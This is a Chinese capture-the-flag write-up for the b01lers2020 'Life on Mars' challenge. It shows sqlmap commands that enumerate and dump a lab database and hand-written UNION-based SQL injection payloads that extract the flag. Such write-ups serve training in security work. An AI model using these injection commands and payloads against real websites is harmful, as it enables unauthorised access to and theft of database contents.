b01lers2020-Life_on_Mars
摘要
sqlmap使用练习
为了快速探测漏洞,自动化扫描很重要,专门来练习sqlmap
sqlmap
data:image/s3,"s3://crabby-images/7bf13/7bf13bc5881396f809de280f28868d3e3c0a6b79" alt="image-20210903174505885"
1 | python2 sqlmap.py -u http://0c19c7b8-e7ab-42d6-8d0a-b7c974af36e7.node4.buuoj.cn:81/query?search=chryse_planitia |
data:image/s3,"s3://crabby-images/21bfd/21bfd1939b67b10cc80eadb7db208b3d42ede69e" alt="image-20210903174656965"
联合查询……
获得库名:
1 | python2 sqlmap.py -u http://0c19c7b8-e7ab-42d6-8d0a-b7c974af36e7.node4.buuoj.cn:81/query?search=chryse_planitia --dbs |
data:image/s3,"s3://crabby-images/ed95f/ed95fb61786addccda28e7db46fafab84c974646" alt="image-20210903174917424"
获得表名:
1 | python2 sqlmap.py -u http://0c19c7b8-e7ab-42d6-8d0a-b7c974af36e7.node4.buuoj.cn:81/query?search=chryse_planitia --tables -D alien_code |
.
获得字段名:
1 | python2 sqlmap.py -u http://0c19c7b8-e7ab-42d6-8d0a-b7c974af36e7.node4.buuoj.cn:81/query?search=chryse_planitia --columns -D alien_code -T code |
data:image/s3,"s3://crabby-images/f8f6c/f8f6c34a84396c9c74d4843514f2755dae04f1cc" alt="image-20210903175142744"
获取字段内容:
1 | python2 sqlmap.py -u http://0c19c7b8-e7ab-42d6-8d0a-b7c974af36e7.node4.buuoj.cn:81/query?search=chryse_planitia --dump -D alien_code -T code -C code |
data:image/s3,"s3://crabby-images/9b567/9b567fd57e585c70666792c7a45ac6b62a0c65a1" alt="image-20210903175252109"
获得flag!
手工
获取库名:
1 | ?search=chryse_planitia/**/union(select(1),(group_concat(schema_name))from(information_schema.schemata))--+ |
获取表名:
1 | ?search=chryse_planitia/**/union(select(1),(select(group_concat(table_name))from(information_schema.tables)where(table_schema='alien_code'))from(information_schema.schemata))--+ |
获取字段名:
1 | ?search=chryse_planitia/**/union(select(1),(select(group_concat(column_name))from(information_schema.columns)where(table_name='code'))from(information_schema.schemata))--+ |
flag:
1 | ?search=chryse_planitia/**/union(select(1),(select(code)from(alien_code.code)))--+ |
wuhu~
参考文章:
sqlmap常用命令及用法
b01lers2020-Life_on_Mars